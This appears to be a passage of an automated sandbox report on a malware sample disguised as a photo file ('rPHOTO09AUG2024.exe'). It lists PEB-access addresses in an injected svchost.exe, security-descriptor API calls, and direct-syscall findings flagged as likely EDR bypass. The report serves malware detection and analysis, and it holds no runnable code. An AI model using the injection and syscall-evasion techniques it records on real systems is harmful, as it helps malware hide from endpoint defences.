Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037C6B40 mov eax, dword ptr fs:[00000030h]	2_2_037C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037FAB40 mov eax, dword ptr fs:[00000030h]	2_2_037FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037D8B42 mov eax, dword ptr fs:[00000030h]	2_2_037D8B42
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375EB20 mov eax, dword ptr fs:[00000030h]	2_2_0375EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375EB20 mov eax, dword ptr fs:[00000030h]	2_2_0375EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037F8B28 mov eax, dword ptr fs:[00000030h]	2_2_037F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037F8B28 mov eax, dword ptr fs:[00000030h]	2_2_037F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]	2_2_037AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]	2_2_037AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]	2_2_037AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]	2_2_037AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]	2_2_037AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]	2_2_037AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]	2_2_037AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]	2_2_037AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]	2_2_037AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03738BF0 mov eax, dword ptr fs:[00000030h]	2_2_03738BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03738BF0 mov eax, dword ptr fs:[00000030h]	2_2_03738BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03738BF0 mov eax, dword ptr fs:[00000030h]	2_2_03738BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375EBFC mov eax, dword ptr fs:[00000030h]	2_2_0375EBFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037BCBF0 mov eax, dword ptr fs:[00000030h]	2_2_037BCBF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037DEBD0 mov eax, dword ptr fs:[00000030h]	2_2_037DEBD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03750BCB mov eax, dword ptr fs:[00000030h]	2_2_03750BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03750BCB mov eax, dword ptr fs:[00000030h]	2_2_03750BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03750BCB mov eax, dword ptr fs:[00000030h]	2_2_03750BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03730BCD mov eax, dword ptr fs:[00000030h]	2_2_03730BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03730BCD mov eax, dword ptr fs:[00000030h]	2_2_03730BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03730BCD mov eax, dword ptr fs:[00000030h]	2_2_03730BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740BBE mov eax, dword ptr fs:[00000030h]	2_2_03740BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740BBE mov eax, dword ptr fs:[00000030h]	2_2_03740BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03804A80 mov eax, dword ptr fs:[00000030h]	2_2_03804A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037ACA72 mov eax, dword ptr fs:[00000030h]	2_2_037ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037ACA72 mov eax, dword ptr fs:[00000030h]	2_2_037ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376CA6F mov eax, dword ptr fs:[00000030h]	2_2_0376CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376CA6F mov eax, dword ptr fs:[00000030h]	2_2_0376CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376CA6F mov eax, dword ptr fs:[00000030h]	2_2_0376CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037DEA60 mov eax, dword ptr fs:[00000030h]	2_2_037DEA60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]	2_2_03736A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]	2_2_03736A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]	2_2_03736A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]	2_2_03736A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]	2_2_03736A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]	2_2_03736A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]	2_2_03736A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740A5B mov eax, dword ptr fs:[00000030h]	2_2_03740A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740A5B mov eax, dword ptr fs:[00000030h]	2_2_03740A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03754A35 mov eax, dword ptr fs:[00000030h]	2_2_03754A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03754A35 mov eax, dword ptr fs:[00000030h]	2_2_03754A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376CA38 mov eax, dword ptr fs:[00000030h]	2_2_0376CA38
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376CA24 mov eax, dword ptr fs:[00000030h]	2_2_0376CA24
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375EA2E mov eax, dword ptr fs:[00000030h]	2_2_0375EA2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037BCA11 mov eax, dword ptr fs:[00000030h]	2_2_037BCA11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376AAEE mov eax, dword ptr fs:[00000030h]	2_2_0376AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376AAEE mov eax, dword ptr fs:[00000030h]	2_2_0376AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03730AD0 mov eax, dword ptr fs:[00000030h]	2_2_03730AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03764AD0 mov eax, dword ptr fs:[00000030h]	2_2_03764AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03764AD0 mov eax, dword ptr fs:[00000030h]	2_2_03764AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03786ACC mov eax, dword ptr fs:[00000030h]	2_2_03786ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03786ACC mov eax, dword ptr fs:[00000030h]	2_2_03786ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03786ACC mov eax, dword ptr fs:[00000030h]	2_2_03786ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03738AA0 mov eax, dword ptr fs:[00000030h]	2_2_03738AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03738AA0 mov eax, dword ptr fs:[00000030h]	2_2_03738AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03786AA4 mov eax, dword ptr fs:[00000030h]	2_2_03786AA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03768A90 mov edx, dword ptr fs:[00000030h]	2_2_03768A90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]	2_2_0373EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]	2_2_0373EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]	2_2_0373EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]	2_2_0373EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]	2_2_0373EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]	2_2_0373EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]	2_2_0373EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]	2_2_0373EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]	2_2_0373EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037D4978 mov eax, dword ptr fs:[00000030h]	2_2_037D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037D4978 mov eax, dword ptr fs:[00000030h]	2_2_037D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037BC97C mov eax, dword ptr fs:[00000030h]	2_2_037BC97C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03756962 mov eax, dword ptr fs:[00000030h]	2_2_03756962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03756962 mov eax, dword ptr fs:[00000030h]	2_2_03756962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03756962 mov eax, dword ptr fs:[00000030h]	2_2_03756962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0377096E mov eax, dword ptr fs:[00000030h]	2_2_0377096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0377096E mov edx, dword ptr fs:[00000030h]	2_2_0377096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0377096E mov eax, dword ptr fs:[00000030h]	2_2_0377096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B0946 mov eax, dword ptr fs:[00000030h]	2_2_037B0946
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B892A mov eax, dword ptr fs:[00000030h]	2_2_037B892A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037C892B mov eax, dword ptr fs:[00000030h]	2_2_037C892B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037BC912 mov eax, dword ptr fs:[00000030h]	2_2_037BC912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03728918 mov eax, dword ptr fs:[00000030h]	2_2_03728918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03728918 mov eax, dword ptr fs:[00000030h]	2_2_03728918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037AE908 mov eax, dword ptr fs:[00000030h]	2_2_037AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037AE908 mov eax, dword ptr fs:[00000030h]	2_2_037AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037629F9 mov eax, dword ptr fs:[00000030h]	2_2_037629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037629F9 mov eax, dword ptr fs:[00000030h]	2_2_037629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037BE9E0 mov eax, dword ptr fs:[00000030h]	2_2_037BE9E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0373A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0373A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0373A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0373A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0373A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0373A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037649D0 mov eax, dword ptr fs:[00000030h]	2_2_037649D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037FA9D3 mov eax, dword ptr fs:[00000030h]	2_2_037FA9D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037C69C0 mov eax, dword ptr fs:[00000030h]	2_2_037C69C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B89B3 mov esi, dword ptr fs:[00000030h]	2_2_037B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B89B3 mov eax, dword ptr fs:[00000030h]	2_2_037B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B89B3 mov eax, dword ptr fs:[00000030h]	2_2_037B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]	2_2_037429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]	2_2_037429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]	2_2_037429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]	2_2_037429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]	2_2_037429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]	2_2_037429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]	2_2_037429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]	2_2_037429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]	2_2_037429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]	2_2_037429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]	2_2_037429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]	2_2_037429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]	2_2_037429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037309AD mov eax, dword ptr fs:[00000030h]	2_2_037309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037309AD mov eax, dword ptr fs:[00000030h]	2_2_037309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037BE872 mov eax, dword ptr fs:[00000030h]	2_2_037BE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037BE872 mov eax, dword ptr fs:[00000030h]	2_2_037BE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037C6870 mov eax, dword ptr fs:[00000030h]	2_2_037C6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037C6870 mov eax, dword ptr fs:[00000030h]	2_2_037C6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03760854 mov eax, dword ptr fs:[00000030h]	2_2_03760854
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03734859 mov eax, dword ptr fs:[00000030h]	2_2_03734859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03734859 mov eax, dword ptr fs:[00000030h]	2_2_03734859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03742840 mov ecx, dword ptr fs:[00000030h]	2_2_03742840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03752835 mov eax, dword ptr fs:[00000030h]	2_2_03752835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03752835 mov eax, dword ptr fs:[00000030h]	2_2_03752835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03752835 mov eax, dword ptr fs:[00000030h]	2_2_03752835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03752835 mov ecx, dword ptr fs:[00000030h]	2_2_03752835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03752835 mov eax, dword ptr fs:[00000030h]	2_2_03752835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03752835 mov eax, dword ptr fs:[00000030h]	2_2_03752835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376A830 mov eax, dword ptr fs:[00000030h]	2_2_0376A830
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037D483A mov eax, dword ptr fs:[00000030h]	2_2_037D483A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037D483A mov eax, dword ptr fs:[00000030h]	2_2_037D483A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037BC810 mov eax, dword ptr fs:[00000030h]	2_2_037BC810
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376C8F9 mov eax, dword ptr fs:[00000030h]	2_2_0376C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376C8F9 mov eax, dword ptr fs:[00000030h]	2_2_0376C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037FA8E4 mov eax, dword ptr fs:[00000030h]	2_2_037FA8E4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375E8C0 mov eax, dword ptr fs:[00000030h]	2_2_0375E8C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037BC89D mov eax, dword ptr fs:[00000030h]	2_2_037BC89D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03730887 mov eax, dword ptr fs:[00000030h]	2_2_03730887
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375AF69 mov eax, dword ptr fs:[00000030h]	2_2_0375AF69
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375AF69 mov eax, dword ptr fs:[00000030h]	2_2_0375AF69
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037D2F60 mov eax, dword ptr fs:[00000030h]	2_2_037D2F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037D2F60 mov eax, dword ptr fs:[00000030h]	2_2_037D2F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372CF50 mov eax, dword ptr fs:[00000030h]	2_2_0372CF50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372CF50 mov eax, dword ptr fs:[00000030h]	2_2_0372CF50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372CF50 mov eax, dword ptr fs:[00000030h]	2_2_0372CF50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372CF50 mov eax, dword ptr fs:[00000030h]	2_2_0372CF50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372CF50 mov eax, dword ptr fs:[00000030h]	2_2_0372CF50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372CF50 mov eax, dword ptr fs:[00000030h]	2_2_0372CF50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376CF50 mov eax, dword ptr fs:[00000030h]	2_2_0376CF50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037D0F50 mov eax, dword ptr fs:[00000030h]	2_2_037D0F50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B4F40 mov eax, dword ptr fs:[00000030h]	2_2_037B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B4F40 mov eax, dword ptr fs:[00000030h]	2_2_037B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B4F40 mov eax, dword ptr fs:[00000030h]	2_2_037B4F40

Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe

Code function: 0_2_00D981F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_00D981F7

Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe	Code function: 0_2_00D6A395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_00D6A395
Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe	Code function: 0_2_00D6A364 SetUnhandledExceptionFilter,		0_2_00D6A364

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe	NtResumeThread: Direct from: 0x773836AC	Jump to behavior
Source: C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe	NtMapViewOfSection: Direct from: 0x77382D1C	Jump to behavior
Source: C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe	NtWriteVirtualMemory: Direct from: 0x77382E3C	Jump to behavior
Source: C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe	NtProtectVirtualMemory: Direct from: 0x77382F9C	Jump to behavior
Source: C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe	NtSetInformationThread: Direct from: 0x773763F9	Jump to behavior
Source: C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe	NtCreateMutant: Direct from: 0x773835CC	Jump to behavior
Source: C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe	NtNotifyChangeKey: Direct from: 0x77383C2C	Jump to behavior
Source: C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe	NtSetInformationProcess: Direct from: 0x77382C5C	Jump to behavior
Source: C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe	NtCreateUserProcess: Direct from: 0x7738371C	Jump to behavior
Source: C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe	NtQueryInformationProcess: Direct from: 0x77382C26	Jump to behavior
Source: C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe	NtResumeThread: Direct from: 0x77382FBC	Jump to behavior
Source: C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe	NtWriteVirtualMemory: Direct from: 0x7738490C	Jump to behavior
Source: C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe	NtOpenKeyEx: Direct from: 0x77383C9C	Jump to behavior
Source: C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe	NtReadFile: Direct from: 0x77382ADC	Jump to behavior
Source: C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe	NtAllocateVirtualMemory: Direct from: 0x77382BFC	Jump to behavior
Source: C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe	NtDelayExecution: Direct from: 0x77382DDC	Jump to behavior
Source: C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe	NtQuerySystemInformation: Direct from: 0x77382DFC	Jump to behavior
Source: C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe	NtOpenSection: Direct from: 0x77382E0C	Jump to behavior
Source: C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe	NtQueryVolumeInformationFile: Direct from: 0x77382F2C	Jump to behavior
Source: C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe	NtQuerySystemInformation: Direct from: 0x773848CC	Jump to behavior
Source: C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe	NtReadVirtualMemory: Direct from: 0x77382E8C	Jump to behavior
Source: C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe	NtCreateKey: Direct from: 0x77382C6C	Jump to behavior
Source: C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe	NtClose: Direct from: 0x77382B6C
Source: C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe	NtAllocateVirtualMemory: Direct from: 0x773848EC	Jump to behavior
Source: C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe	NtQueryAttributesFile: Direct from: 0x77382E6C	Jump to behavior
Source: C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe	NtSetInformationThread: Direct from: 0x77382B4C	Jump to behavior
Source: C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe	NtTerminateThread: Direct from: 0x77382FCC	Jump to behavior
Source: C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe	NtQueryInformationToken: Direct from: 0x77382CAC	Jump to behavior
Source: C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe	NtOpenKeyEx: Direct from: 0x77382B9C	Jump to behavior
Source: C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe	NtQueryValueKey: Direct from: 0x77382BEC	Jump to behavior
